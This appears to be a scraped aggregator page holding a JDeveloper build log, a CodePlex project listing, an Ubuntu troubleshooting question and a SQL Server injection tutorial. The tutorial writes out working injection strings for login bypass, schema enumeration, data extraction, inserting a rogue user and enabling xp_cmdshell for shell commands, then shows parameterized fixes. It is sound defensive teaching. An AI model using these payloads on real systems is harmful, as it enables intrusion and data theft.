Wrote Archive Module to /Users/chris/fmw/jdeveloper/jdev/extensions/ oracle.adf.mobile/Samples/PublicSamples/LayoutDemo/ViewController/ deploy/ViewController.jar [01:36:36 PM] Verifying existence of the .adf source directory of the ADF Mobile application... [01:36:36 PM] Verifying Application Controller project exists... [01:36:36 PM] Verifying application dependencies... [01:36:36 PM] The application may not function correctly because the following dependent libraries are missing: /Users/chris/jdev/jdeveloper/jdeveloper/jdev/extensions/oracle.adf.mobile/ lib/adfmf.springboard.jar [01:36:36 PM] Verifying project dependencies... [01:36:36 PM] Validating application XML files... [01:36:36 PM] Validating XML files in project ApplicationController... [01:36:36 PM] Validating XML files in project ViewController... [01:36:40 PM] Copying common javascript files... [01:36:41 PM] Copying FARs to the ADF Mobile Framework application... 
[01:36:41 PM] Extracting Feature Archive file, "ApplicationController.jar" to deployment folder, "ApplicationController". [01:36:42 PM] Extracting Feature Archive file, "ViewController.jar" to deployment folder, "ViewController". [01:36:42 PM] Deploying skinning files... [01:36:43 PM] Copying the CVM SDK files built for the x86 processor... [01:36:43 PM] Copying the CVM JDK files built for the x86 processor... [01:36:43 PM] Command-line executed: [cp, -R, -p, /Users/chris/fmw/jdeveloper/jdev/extensions/oracle.adf.mobile/iOS/jvmti/x86/, /Users/chris/fmw/jdeveloper/jdev/extensions/oracle.adf.mobile/ Samples/PublicSamples/ LayoutDemo/deploy/IOS_MOBILE_NATIVE_archive1/temporary_xcode_project/lib] [01:36:43 PM] Command-line execution succeeded. [01:36:43 PM] Command-line executed: [cp, -R, -p, /Users/chris/fmw/jdeveloper/jdev/extensions/oracle.adf.mobile/iOS/jvmti/jar/, /Users/chris/fmw/jdeveloper/jdev/extensions/oracle.adf.mobile/Samples/ PublicSamples/LayoutDemo/deploy/IOS_MOBILE_NATIVE_archive1/ temporary_xcode_project/lib] [01:36:43 PM] Command-line execution succeeded. [01:36:43 PM] Copying security related files to the ADF Mobile Framework application... [01:36:44 PM] Command-line executed from path: /Users/chris/fmw/jdeveloper/jdev/extensions/oracle.adf.mobile/Samples/ PublicSamples/LayoutDemo/deploy/IOS_MOBILE_NATIVE_archive1/temporary_xcode_project/ [01:36:44 PM] Command-line executed: /Applications/Xcode.app/Contents/Developer/usr/bin/xcodebuild clean install -configuration Debug -sdk /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneSimulator.platform/ Developer/SDKs/iPhoneSimulator6.1.sdk DSTROOT=/Users/chris/fmw/jdeveloper/jdev/extensions/oracle.adf.mobile/Samples/ PublicSamples/LayoutDemo/deploy/IOS_MOBILE_NATIVE_archive1/Destination_Root/ IPHONEOS_DEPLOYMENT_TARGET=5.0 TARGETED_DEVICE_FAMILY=1,2 PRODUCT_NAME=LayoutDemo ADD_SETTINGS_BUNDLE=NO As you can see, once JDeveloper has finished its own work it passes the job off in the last few lines to Apple's XCode to assemble and deploy the required .ipa file.  From the original error message which followed this, complaining about xcodebuild failing with return code 69, we can quickly see the exact command line used to call xcodebuild. As this is the exact command line call with all its options, you're free to open a Terminal window in Mac OS X and execute the same command by simply copying and pasting the command line. And via this you'll then find out what return code 69 actually means.  Unfortunately it's not that exciting. For Macs that have just been installed and configured with XCode, XCode (and for that matter iTunes), which ADF Mobile requires in order to deploy, must have been run at least once beforehand on your brand new Mac (to be clear, that's once ever, not once every restart). On doing so you will be presented with a license agreement from Apple that you must accept. Only once you've done this will the command line calls work.  They're currently failing because you haven't accepted the legal terms and conditions. (Arguably you can also accept the terms and conditions from the command line, but ADF Mobile cannot do this on your behalf, so it's just easier to open the tools and confirm the legal requirements that way.) Putting aside the error code and its meaning, watching the log window, watching what commands are executed and learning what they do will help you diagnose issues yourself and solve these sorts of issues relatively quickly.
From my perspective as an Oracle Product Manager, it allows me to say "this is the stuff you don't need to worry about when you use ADF Mobile when it's configured correctly" .... as you can see my salesman qualities shine through. For anyone who is happily using ADF Mobile on a Mac and wondering why you didn't hit these issues, it's quite likely that you already accepted the license conditions before deploying via ADF Mobile.  For instance, though I'm not a fan of iTunes itself, iTunes was one of the first things I loaded on my Mac to access my Justin Bieber albums. Image courtesy of winnond / FreeDigitalPhotos.net

    Read the article

  • CodePlex Daily Summary for Thursday, June 03, 2010

    CodePlex Daily Summary for Thursday, June 03, 2010New ProjectsAlbatross: Albatross framework. We are still working on the documentation, more details will be available soon.ApiChange: ApiChange is the Swiss army knife for inspecting your assemblies from the command line. Now you can do basic operations like diff, who uses (method...BaseCalendar: BaseCalendar is a server-side ASP.NET web control (WebForms or MVC) that renders a calendar while giving you full control over the generated HTML. ...CESAVE: Proyectos para el Comité Estatal de Sanidad Vegetal.Closure Compiler w/ Annotations Visual Studio 2010 Snippets: This is an attempt to create reusable Visual Studio snippets to make working with closure compiler annotated JavaScript more productive. VS2010 ...Common Service Host: Common Service Host is a generic Windows Communication Service Host and factory that uses the Common Service Locator to create Service objects. ...DarkLight: DarkLight is a 2D Lighting Engine written in XNA, and allows developers to create 2D shadowing effects in their 2D games easily. It supports poi...Earn Burn Tracker: A tool to track earned value against a given release, initiative, feature set, and objects.eOfficeAACS: eOffice is an open source access control and attendance management system developed by e-bird Innovation (www.ebirdinfo.com).Its flexible design al...FLV Video conversion library for .Net 3.5: This is a component created to call the ffmpeg tool to convert various video formats to the Adobe Flash FLV output format. The component also takes...Google Moderator: .NET client library for the Google Moderator API.linq to jquery: provides support for linq to jquery objectsMobile Vikings Data: App to view your data usage RefBrowser: RefBrowserRESX Translator with Bing (from Microsoft Consulting Services, UK): A Windows Form application that automatically translates RESX files using Bing web servicesRhyduino - Remote Arduino Control via Managed Code: Rhyduino makes it easy for Visual Studio / Windows devs to control the Arduino using a computer. It's like supercharging your Arduino with all the ...SharePoint 2010 CSV Bulk Term Set Importer: Allows for multiple import of *.csv files to a given term group in SharePoint 2010 Term Store. It will create new term group based on the name pr...SharePoint Feature - Export history version to Excel: Add a function to list the action button, the ability to export history version of the item sheet to Excel from the specified date. Features suppo...SwEntry: A system that allows people to open doors by using a Bluetooth enabled phone. Things to Do with the DLR: This project is about ideas and sample code around the Dynamic Language Runtime.Work Recorder - Hold on own time!: Work Recorder is a office aid software which can recorde the time used on PC for researchers, office workers and students. And it is also a good he...xuezhixu: xuezhixu foundYaget: Yet Another Game Engine TechnologyNew ReleasesBackUpAnyWhere: backupanywhere RC1: this is the RC of our programBaseCalendar: BaseControls 1.0: BaseControls 1.0 contains the BaseCalendar ASP.NET control.BizTalk Server Pipeline Component Wizard: 2.20: Version suitable for 2010 release.CheckHeader: CheckHeader v0.8.6: The Microsoft .NET Framework 4.0 is needed to run this program.Chirpy - VS Add In For Handling Js, Css, and DotLess Files: Chirpy Installer for VS 2010 (Ver-1.0.0.2): VS 2010 Installer for the Chirpy AddIn. 
Version 1.0.0.2Christoc's DotNetNuke C# Module Development Template: 00.00.01: This is the initial release of Christoc's DotNetNuke C# Module Development Template. You can use the Template as-is, or you can customize the VSTem...Closure Compiler w/ Annotations Visual Studio 2010 Snippets: v1 release: The initial release of the projectCommunity Forums NNTP bridge: Community Forums NNTP Bridge V22: Release of the Community Forums NNTP Bridge to access the social and anwsers MS forums with a single, open source NNTP bridge. This release has ad...Community Forums NNTP bridge: Community Forums NNTP Bridge V23: Release of the Community Forums NNTP Bridge to access the social and anwsers MS forums with a single, open source NNTP bridge. This release has ad...Community Forums NNTP bridge: Community Forums NNTP Bridge V24: Release of the Community Forums NNTP Bridge to access the social and anwsers MS forums with a single, open source NNTP bridge. This release has ad...DarkLight: DarkLight Engine v1.0: This is the first version of the DarkLight engine and currently supports point, spot and area lights with no upper limit on the number of lights. ...DotNetNuke® Skin Collaborate: Collaborate Package 1.1.0: Newer version of Collaborate included fixes: - removed conditional code to display control panel - changed background color to match with backgroun...dotSpatial: System.Spatial.Projection Zip June 2, 2010: This version tries to fix a problem with reprojecting to UTM zones. It is still being tested though.Entity Framework Repository & Unit of Work Template: 1.0.1: This version has more than just the T4 template. I have added a new template that has a RepositoryHelper class for use with StructureMap. Also th...FLV Video conversion library for .Net 3.5: Beta 1: This is the first release of this project. Improvements may be added if necessary.HERB.IQ: Alpha 0.1 Preview: Only clone tab works, just setting up the GUI and getting the XML data handling working correctlyJetfire - Workflow DSL: V1.2.0: The complete source code required for a Jetfire system (server and client nexus) is included in the release. Highlights of Changes Full programmat...linq to jquery: linq to jquery alpha: beta development projectMapWindow6: MapWindow 6.0 June 2, 2010: This version fixes a problem with projecting to UTM zones. I'm not sure that this works perfectly yet. It seemed to require a zone adjustment by ...patterns & practices Web Client Developer Guidance: Developing Web Apps May 2010 Beta: This RelesaeThis drop includes updated documentation, links, and graphics. We are still looking for feedback on this release. Plans going forward...patterns & practices: Composite WPF and Silverlight: Prism 4.0 Drop 1: Prism 4.0 Drop 1 Welcome to the first drop of Prism 4.0 (formally known as the Composite Application Guidance for WPF and Silverlight). This drop i...Powershell4SQL: Version 1.3: Changes from version 1.2 Added support for -Confirm and -WhatIf parameters Added support for -Verbose mode. Includes SQL Batch text, parameters ...RESX Translator with Bing (from Microsoft Consulting Services, UK): v1.0: This is the initial release of the toolRhyduino - Remote Arduino Control via Managed Code: Beta Release (v0.80): LibraryAuto-detects connected Arduino devices. Uses system resources intelligently to take advantage of multiple CPU cores when present. 
Firmata ...SharePoint Feature - Export history version to Excel: Export Item List Version: - multilanguage support Czech, English Install: "C:\Program Files\Common Files\Microsoft Shared\web server extensions\12\BIN\stsadm.exe" -o addsol...Simulo: Simulo v2.5: That's the third release of Simulo (v2.5). For detailed info on what's new, read the changes log block at the project's home page. System requirem...Site Directory for SharePoint 2010 (from Microsoft Consulting Services, UK): v1.5: Please carefully follow the Installation Guideas there are additional actions that need to be undertaken in this release. As 1.4 with the followin...Spackle.NET: 4.1.0.0 Release: Added IEquatable<T> to Range<T>StreamInsight Samples: Microsoft StreamInsight Product Team Samples: This is the current snapshot of the samples created by the Streaminsight Product Team.Touch Mice: 0.1: Initial release of Touch MiceVCC: Latest build, v2.1.30602.0: Automatic drop of latest buildVivoSocial: VivoSocial 7.2.0: Version 7.2.0 of VivoSocial has been released. If you experienced any issues with the previous version, please update your modules to the 7.2.0 rel...Work Recorder - Hold on own time!: WorkRecorder 1.0: +Finished Version 1.0Most Popular ProjectsCommunity Forums NNTP bridgeOutSyncASP.NET MVC Time PlannerNeatUploadMoonyDesk (windows desktop widgets)Mute4eXpress Persistent Objects (XPO) ToolkitAgUnit - Silverlight unit testing with ReSharperASP.NET MVC ExtensionsAviva Solutions C# Coding GuidelinesMost Active ProjectsCommunity Forums NNTP bridgeGMap.NET - Great Maps for Windows Forms & PresentationRawrIonics Isapi Rewrite FilterN2 CMSpatterns & practices – Enterprise LibraryBlogEngine.NETGameSetFarseer Physics EngineMirror Testing System

    Read the article

  • SQL Server SQL Injection from start to end

    - by Mladen Prajdic
SQL injection is a method by which a hacker gains access to the database server by injecting specially formatted data through the user interface input fields. In the last few years we have witnessed a huge increase in the number of reported SQL injection attacks, many of which caused a great deal of damage. A SQL injection attack takes many guises, but the underlying method is always the same. The specially formatted data starts with an apostrophe (') to end the string column (usually username) check, continues with malicious SQL, and then ends with the SQL comment mark (--) in order to comment out the full original SQL that was intended to be submitted. The really advanced methods use binary or encoded text inputs instead of clear text. SQL injection vulnerabilities are often thought to be a database server problem. In reality they are a pure application design problem, generally resulting from unsafe techniques for dynamically constructing SQL statements that require user input. It also doesn't help that many web pages allow SQL Server error messages to be exposed to the user, have no input clean-up or validation, allow applications to connect with elevated (e.g. sa) privileges, and so on. Usually that's caused by novice developers who just copy-and-paste code found on the internet without understanding the possible consequences. The first line of defense is to never let your applications connect via an admin account like sa. This account has full privileges on the server and so you virtually give the attacker open access to all your databases, servers, and network. The second line of defense is never to expose SQL Server error messages to the end user. Finally, always use safe methods for building dynamic SQL, using properly parameterized statements. Hopefully, all of this will be clearly demonstrated as we work through two of the most common ways that enable SQL injection attacks, and how to remove the vulnerability: 1) Concatenating SQL statements on the client by hand 2) Using parameterized stored procedures but passing in parts of SQL statements As will become clear, SQL Injection vulnerabilities cannot be solved by simple database refactoring; often, both the application and database have to be redesigned to solve this problem. Concatenating SQL statements on the client This problem is caused when user-entered data is inserted into a dynamically-constructed SQL statement, by string concatenation, and then submitted for execution. Developers often think that some method of input sanitization is the solution to this problem, but the correct solution is to correctly parameterize the dynamic SQL. In this simple example, the code accepts a username and password and, if the user exists, returns the requested data. First the SQL code is shown that builds the table and test data, then the C# code with the actual SQL Injection example from beginning to end. The comments in the code provide information on what actually happens. /* SQL CODE *//* Users table holds usernames and passwords and is the object of our hacking attempt */CREATE TABLE Users( UserId INT IDENTITY(1, 1) PRIMARY KEY , UserName VARCHAR(50) , UserPassword NVARCHAR(10))/* Insert 2 users */INSERT INTO Users(UserName, UserPassword)SELECT 'User 1', 'MyPwd' UNION ALLSELECT 'User 2', 'BlaBla' Vulnerable C# code, followed by a progressive SQL injection attack. /* .NET C# CODE *//*This method checks if a user exists. 
It uses SQL concatination on the client, which is susceptible to SQL injection attacks*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=YourServerName; database=tempdb; Integrated Security=SSPI;")) { /* This is the SQL string you usually see with novice developers. It returns a row if a user exists and no rows if it doesn't */ string sql = "SELECT * FROM Users WHERE UserName = '" + username + "' AND UserPassword = '" + password + "'"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists != "0"; } }}/*The SQL injection attack example. Username inputs should be run one after the other, to demonstrate the attack pattern.*/string username = "User 1";string password = "MyPwd";// See if we can even use SQL injection.// By simply using this we can log into the application username = "' OR 1=1 --";// What follows is a step-by-step guessing game designed // to find out column names used in the query, via the // error messages. By using GROUP BY we will get // the column names one by one.// First try the Idusername = "' GROUP BY Id HAVING 1=1--";// We get the SQL error: Invalid column name 'Id'.// From that we know that there's no column named Id. // Next up is UserIDusername = "' GROUP BY Users.UserId HAVING 1=1--";// AHA! here we get the error: Column 'Users.UserName' is // invalid in the SELECT list because it is not contained // in either an aggregate function or the GROUP BY clause.// We have guessed correctly that there is a column called // UserId and the error message has kindly informed us of // a table called Users with a column called UserName// Now we add UserName to our GROUP BYusername = "' GROUP BY Users.UserId, Users.UserName HAVING 1=1--";// We get the same error as before but with a new column // name, Users.UserPassword// Repeat this pattern till we have all column names that // are being return by the query.// Now we have to get the column data types. One non-string // data type is all we need to wreck havoc// Because 0 can be implicitly converted to any data type in SQL server we use it to fill up the UNION.// This can be done because we know the number of columns the query returns FROM our previous hacks.// Because SUM works for UserId we know it's an integer type. 
It doesn't matter which exactly.username = "' UNION SELECT SUM(Users.UserId), 0, 0 FROM Users--";// SUM() errors out for UserName and UserPassword columns giving us their data types:// Error: Operand data type varchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserName) FROM Users--";// Error: Operand data type nvarchar is invalid for SUM operator.username = "' UNION SELECT SUM(Users.UserPassword) FROM Users--";// Because we know the Users table structure we can insert our data into itusername = "'; INSERT INTO Users(UserName, UserPassword) SELECT 'Hacker user', 'Hacker pwd'; --";// Next let's get the actual data FROM the tables.// There are 2 ways you can do this.// The first is by using MIN on the varchar UserName column and // getting the data from error messages one by one like this:username = "' UNION SELECT min(UserName), 0, 0 FROM Users --";username = "' UNION SELECT min(UserName), 0, 0 FROM Users WHERE UserName > 'User 1'--";// we can repeat this method until we get all data one by one// The second method gives us all data at once and we can use it as soon as we find a non string columnusername = "' UNION SELECT (SELECT * FROM Users FOR XML RAW) as c1, 0, 0 --";// The error we get is: // Conversion failed when converting the nvarchar value // '<row UserId="1" UserName="User 1" UserPassword="MyPwd"/>// <row UserId="2" UserName="User 2" UserPassword="BlaBla"/>// <row UserId="3" UserName="Hacker user" UserPassword="Hacker pwd"/>' // to data type int.// We can see that the returned XML contains all table data including our injected user account.// By using the XML trick we can get any database or server info we wish as long as we have access// Some examples:// Get info for all databasesusername = "' UNION SELECT (SELECT name, dbid, convert(nvarchar(300), sid) as sid, cmptlevel, filename FROM master..sysdatabases FOR XML RAW) as c1, 0, 0 --";// Get info for all tables in master databaseusername = "' UNION SELECT (SELECT * FROM master.INFORMATION_SCHEMA.TABLES FOR XML RAW) as c1, 0, 0 --";// If that's not enough here's a way the attacker can gain shell access to your underlying windows server// This can be done by enabling and using the xp_cmdshell stored procedure// Enable xp_cmdshellusername = "'; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;";// Create a table to store the values returned by xp_cmdshellusername = "'; CREATE TABLE ShellHack (ShellData NVARCHAR(MAX))--";// list files in the current SQL Server directory with xp_cmdshell and store it in ShellHack table username = "'; INSERT INTO ShellHack EXEC xp_cmdshell \"dir\"--";// return the data via an error messageusername = "' UNION SELECT (SELECT * FROM ShellHack FOR XML RAW) as c1, 0, 0; --";// delete the table to get clean output (this step is optional)username = "'; DELETE ShellHack; --";// repeat the upper 3 statements to do other nasty stuff to the windows server// If the returned XML is larger than 8k you'll get the "String or binary data would be truncated." error// To avoid this chunk up the returned XML using paging techniques. // the username and password params come from the GUI textboxes.bool userExists = DoesUserExist(username, password ); Having demonstrated all of the information a hacker can get his hands on as a result of this single vulnerability, it's perhaps reassuring to know that the fix is very easy: use parameters, as show in the following example. 
/* The fixed C# method that doesn't suffer from SQL injection because it uses parameters.*/private bool DoesUserExist(string username, string password){ using (SqlConnection conn = new SqlConnection(@"server=baltazar\sql2k8; database=tempdb; Integrated Security=SSPI;")) { //This is the version of the SQL string that should be safe from SQL injection string sql = "SELECT * FROM Users WHERE UserName = @username AND UserPassword = @password"; SqlCommand cmd = conn.CreateCommand(); cmd.CommandText = sql; cmd.CommandType = CommandType.Text; // adding 2 SQL Parameters solves the SQL injection issue completely SqlParameter usernameParameter = new SqlParameter(); usernameParameter.ParameterName = "@username"; usernameParameter.DbType = DbType.String; usernameParameter.Value = username; cmd.Parameters.Add(usernameParameter); SqlParameter passwordParameter = new SqlParameter(); passwordParameter.ParameterName = "@password"; passwordParameter.DbType = DbType.String; passwordParameter.Value = password; cmd.Parameters.Add(passwordParameter); cmd.Connection.Open(); DataSet dsResult = new DataSet(); /* If a user doesn't exist the cmd.ExecuteScalar() returns null; this is just to simplify the example; you can use other Execute methods too */ string userExists = (cmd.ExecuteScalar() ?? "0").ToString(); return userExists != "0"; }} We have seen just how much danger we're in if our code is vulnerable to SQL Injection. If you find code that contains such problems, then refactoring is not optional; it simply has to be done and no amount of deadline pressure should be a reason not to do it. Better yet, of course, never allow such vulnerabilities into your code in the first place. Your business is only as valuable as your data. If you lose your data, you lose your business. Period. Incorrect parameterization in stored procedures It is a common misconception that the mere act of using stored procedures somehow magically protects you from SQL Injection. There is no truth in this rumor. If you build SQL strings by concatenation and rely on user input then you are just as vulnerable doing it in a stored procedure as anywhere else. This anti-pattern often emerges when developers want to have a single "master access" stored procedure to which they'd pass a table name, column list or some other part of the SQL statement. This may seem like a good idea from the viewpoint of object reuse and maintenance but it's a huge security hole. The following example shows what a hacker can do with such a setup. 
/*Create a single master access stored procedure*/CREATE PROCEDURE spSingleAccessSproc( @select NVARCHAR(500) = '' , @tableName NVARCHAR(500) = '' , @where NVARCHAR(500) = '1=1' , @orderBy NVARCHAR(500) = '1')ASEXEC('SELECT ' + @select + ' FROM ' + @tableName + ' WHERE ' + @where + ' ORDER BY ' + @orderBy)GO/*Valid use as anticipated by a novice developer*/EXEC spSingleAccessSproc @select = '*', @tableName = 'Users', @where = 'UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = 'UserID'/*Malicious use: SQL injection. The SQL injection principles are the same as with SQL string concatenation I described earlier, so I won't repeat them again here.*/EXEC spSingleAccessSproc @select = '* FROM INFORMATION_SCHEMA.TABLES FOR XML RAW --', @tableName = '--Users', @where = '--UserName = ''User 1'' AND UserPassword = ''MyPwd''', @orderBy = '--UserID' One might think that this is a "made up" example but in all my years of reading SQL forums and answering questions there were quite a few people with "brilliant" ideas like this one. Hopefully I've managed to demonstrate the dangers of such code. Even if you think your code is safe, double-check. If there's even one place where you're not using properly parameterized SQL you have a vulnerability, and SQL injection can bear its ugly teeth.
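As a closing sketch of the safe alternative to the "master access" anti-pattern: give each operation its own narrowly-scoped stored procedure that accepts only typed data parameters, and call it from the client with CommandType.StoredProcedure so user input is only ever treated as data, never as part of the statement. This is a minimal illustration under assumptions: the procedure name spGetUserByName and the client method name are mine, not from the original article, though the Users table matches the schema created above.
/* A minimal sketch of the safe stored-procedure pattern (names are illustrative).
   Requires: using System.Data; using System.Data.SqlClient;
   The matching procedure only ever treats its arguments as data:
   CREATE PROCEDURE spGetUserByName
       @username VARCHAR(50), @password NVARCHAR(10)
   AS
   SELECT UserId FROM Users WHERE UserName = @username AND UserPassword = @password
*/
private bool DoesUserExistViaSproc(string username, string password)
{
    using (SqlConnection conn = new SqlConnection(@"server=YourServerName; database=tempdb; Integrated Security=SSPI;"))
    using (SqlCommand cmd = conn.CreateCommand())
    {
        // The command text is a procedure name, not a SQL batch, so nothing the
        // user types can change the shape of the statement that gets executed.
        cmd.CommandType = CommandType.StoredProcedure;
        cmd.CommandText = "spGetUserByName";
        cmd.Parameters.Add("@username", SqlDbType.VarChar, 50).Value = username;
        cmd.Parameters.Add("@password", SqlDbType.NVarChar, 10).Value = password;

        conn.Open();
        // Any row back means the credentials matched.
        using (SqlDataReader reader = cmd.ExecuteReader())
        {
            return reader.HasRows;
        }
    }
}
The same idea applies inside T-SQL itself: if dynamic SQL is genuinely unavoidable, build it with sp_executesql and typed parameters (and QUOTENAME for identifiers) rather than concatenating raw input into an EXEC string.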

    Read the article

  • ubuntu 12.04 python problem or?

    - by Trki
    Hi i am trying to fix this for a long time but without success. When i open my zsh terminal i get this error: (terminal is working but error appear) Welcome to the world of tomorrow! virtualenvwrapper_run_hook:12: permission denied: virtualenvwrapper.sh: There was a problem running the initialization hooks. If Python could not import the module virtualenvwrapper.hook_loader, check that virtualenv has been installed for VIRTUALENVWRAPPER_PYTHON= and that PATH is set properly. I tried few things but... dont know how to solve it. Somehow during looking for a search i found i should post here an output of: ? sudo dpkg --configure -a Setting up python-pip (1.0-1build1) ... /var/lib/dpkg/info/python-pip.postinst: 6: /var/lib/dpkg/info/python-pip.postinst: pycompile: not found dpkg: error processing python-pip (--configure): subprocess installed post-installation script returned error exit status 127 Setting up libc-dev-bin (2.15-0ubuntu10.5) ... Setting up gnome-control-center-data (1:3.4.2-0ubuntu0.13) ... Setting up linux-libc-dev (3.2.0-56.86) ... Setting up python-virtualenv (1.7.1.2-1) ... /var/lib/dpkg/info/python-virtualenv.postinst: 6: /var/lib/dpkg/info/python-virtualenv.postinst: pycompile: not found dpkg: error processing python-virtualenv (--configure): subprocess installed post-installation script returned error exit status 127 Setting up libglib2.0-0 (2.32.4-0ubuntu1) ... Setting up libglib2.0-0:i386 (2.32.4-0ubuntu1) ... Setting up gimp (2.6.12-1ubuntu1.2) ... /var/lib/dpkg/info/gimp.postinst: 11: /var/lib/dpkg/info/gimp.postinst: pycompile: not found dpkg: error processing gimp (--configure): subprocess installed post-installation script returned error exit status 127 Setting up libpolkit-gobject-1-0 (0.104-1ubuntu1.1) ... Setting up libgnome-control-center1 (1:3.4.2-0ubuntu0.13) ... Setting up libnm-util2 (0.9.4.0-0ubuntu4.3) ... Setting up libc6-dev (2.15-0ubuntu10.5) ... Setting up libpulse-mainloop-glib0 (1:1.1-0ubuntu15.4) ... dpkg: dependency problems prevent configuration of virtualenvwrapper: virtualenvwrapper depends on python-virtualenv; however: Package python-virtualenv is not configured yet. dpkg: error processing virtualenvwrapper (--configure): dependency problems - leaving unconfigured Setting up libpolkit-agent-1-0 (0.104-1ubuntu1.1) ... Setting up libupower-glib1 (0.9.15-3git1ubuntu0.1) ... Setting up libaccountsservice0 (0.6.15-2ubuntu9.6.1) ... Setting up libpolkit-backend-1-0 (0.104-1ubuntu1.1) ... Setting up libglib2.0-bin (2.32.4-0ubuntu1) ... Setting up libnm-glib4 (0.9.4.0-0ubuntu4.3) ... Setting up policykit-1 (0.104-1ubuntu1.1) ... Setting up gnome-settings-daemon (3.4.2-0ubuntu0.6.4) ... Setting up accountsservice (0.6.15-2ubuntu9.6.1) ... dpkg: error processing ubuntu-system-service (--configure): Package is in a very bad inconsistent state - you should reinstall it before attempting configuration. Processing triggers for libc-bin ... ldconfig deferred processing now taking place Errors were encountered while processing: python-pip python-virtualenv gimp virtualenvwrapper ubuntu-system-service Also: ? 
python --version zsh: command not found: python Part of my ~/.zshrc # python virtual env wrapper if [ -f ~/.local/bin/virtualenvwrapper.sh ]; then export WORKON_HOME=~/.virtualenvs source ~/.local/bin/virtualenvwrapper.sh plugins=("${plugins[@]}" virtualenvwrapper) fi # pythonbrew [[ -s ~/.pythonbrew/etc/bashrc ]] && source ~/.pythonbrew/etc/bashrc Part os zsh -xv # # Invoke the initialization functions # virtualenvwrapper_initialize +/home/trki/.local/bin/virtualenvwrapper.sh:1179> virtualenvwrapper_initialize +virtualenvwrapper_initialize:1> virtualenvwrapper_derive_workon_home +virtualenvwrapper_derive_workon_home:1> typeset 'workon_home_dir=/home/trki/.virtualenvs' +virtualenvwrapper_derive_workon_home:5> [ /home/trki/.virtualenvs '=' '' ']' +virtualenvwrapper_derive_workon_home:12> echo /home/trki/.virtualenvs +virtualenvwrapper_derive_workon_home:12> unset GREP_OPTIONS +virtualenvwrapper_derive_workon_home:12> grep '^[^/~]' +virtualenvwrapper_derive_workon_home:21> echo /home/trki/.virtualenvs +virtualenvwrapper_derive_workon_home:21> unset GREP_OPTIONS +virtualenvwrapper_derive_workon_home:21> egrep '([\$~]|//)' +virtualenvwrapper_derive_workon_home:30> echo /home/trki/.virtualenvs +virtualenvwrapper_derive_workon_home:31> return 0 +virtualenvwrapper_initialize:1> export 'WORKON_HOME=/home/trki/.virtualenvs' +virtualenvwrapper_initialize:3> virtualenvwrapper_verify_workon_home -q +virtualenvwrapper_verify_workon_home:1> RC=0 +virtualenvwrapper_verify_workon_home:2> [ ! -d /home/trki/.virtualenvs/ ']' +virtualenvwrapper_verify_workon_home:11> return 0 +virtualenvwrapper_initialize:6> [ /home/trki/.virtualenvs '=' '' ']' +virtualenvwrapper_initialize:11> virtualenvwrapper_run_hook initialize +virtualenvwrapper_run_hook:1> typeset hook_script +virtualenvwrapper_run_hook:2> typeset result +virtualenvwrapper_run_hook:4> hook_script=+virtualenvwrapper_run_hook:4> virtualenvwrapper_tempfile initialize-hook +virtualenvwrapper_tempfile:2> typeset 'suffix=initialize-hook' +virtualenvwrapper_tempfile:3> typeset file +virtualenvwrapper_tempfile:5> file=+virtualenvwrapper_tempfile:5> virtualenvwrapper_mktemp -t virtualenvwrapper-initialize-hook-XXXXXXXXXX +virtualenvwrapper_mktemp:1> mktemp -t virtualenvwrapper-initialize-hook-XXXXXXXXXX +virtualenvwrapper_tempfile:5> file=/tmp/virtualenvwrapper-initialize-hook-OhY86PXmo7 +virtualenvwrapper_tempfile:6> [ 0 -ne 0 ']' +virtualenvwrapper_tempfile:6> [ -z /tmp/virtualenvwrapper-initialize-hook-OhY86PXmo7 ']' +virtualenvwrapper_tempfile:6> [ ! -f /tmp/virtualenvwrapper-initialize-hook-OhY86PXmo7 ']' +virtualenvwrapper_tempfile:11> echo /tmp/virtualenvwrapper-initialize-hook-OhY86PXmo7 +virtualenvwrapper_tempfile:12> return 0 +virtualenvwrapper_run_hook:4> hook_script=/tmp/virtualenvwrapper-initialize-hook-OhY86PXmo7 +virtualenvwrapper_run_hook:11> cd /home/trki/.virtualenvs +cd:1> [[ x/home/trki/.virtualenvs == x... ]] +cd:3> [[ x/home/trki/.virtualenvs == x.... ]] +cd:5> [[ x/home/trki/.virtualenvs == x..... ]] +cd:7> [[ x/home/trki/.virtualenvs == x...... 
]] +cd:9> [ -d /home/trki/.autoenv ']' +cd:13> cd /home/trki/.virtualenvs +virtualenvwrapper_run_hook:12> '' -m virtualenvwrapper.hook_loader --script /tmp/virtualenvwrapper-initialize-hook-OhY86PXmo7 initialize virtualenvwrapper_run_hook:12: permission denied: +virtualenvwrapper_run_hook:15> result=126 +virtualenvwrapper_run_hook:17> [ 126 -eq 0 ']' +virtualenvwrapper_run_hook:27> [ initialize '=' initialize ']' +virtualenvwrapper_run_hook:29> cat - virtualenvwrapper.sh: There was a problem running the initialization hooks. If Python could not import the module virtualenvwrapper.hook_loader, check that virtualenv has been installed for VIRTUALENVWRAPPER_PYTHON= and that PATH is set properly. +virtualenvwrapper_run_hook:38> rm -f /tmp/virtualenvwrapper-initialize-hook-OhY86PXmo7 +virtualenvwrapper_run_hook:39> return 126 +virtualenvwrapper_initialize:13> virtualenvwrapper_setup_tab_completion +virtualenvwrapper_setup_tab_completion:1> [ -n '' ']' +virtualenvwrapper_setup_tab_completion:20> [ -n 4.3.17 ']' +virtualenvwrapper_setup_tab_completion:30> compctl -K _virtualenvs workon rmvirtualenv cpvirtualenv showvirtualenv +virtualenvwrapper_setup_tab_completion:31> compctl -K _cdvirtualenv_complete cdvirtualenv +virtualenvwrapper_setup_tab_completion:32> compctl -K _cdsitepackages_complete cdsitepackages +virtualenvwrapper_initialize:15> return 0 +/home/trki/.zshrc:17> plugins=( git python django symfony2 zsh-syntax-highlighting composer history-substring-search virtualenvwrapper ) # pythonbrew [[ -s ~/.pythonbrew/etc/bashrc ]] && source ~/.pythonbrew/etc/bashrc +/home/trki/.zshrc:21> [[ -s /home/trki/.pythonbrew/etc/bashrc ]] Also when i try to open ubuntu software center absolutly nothing happens. No idea what to do now.

    Read the article

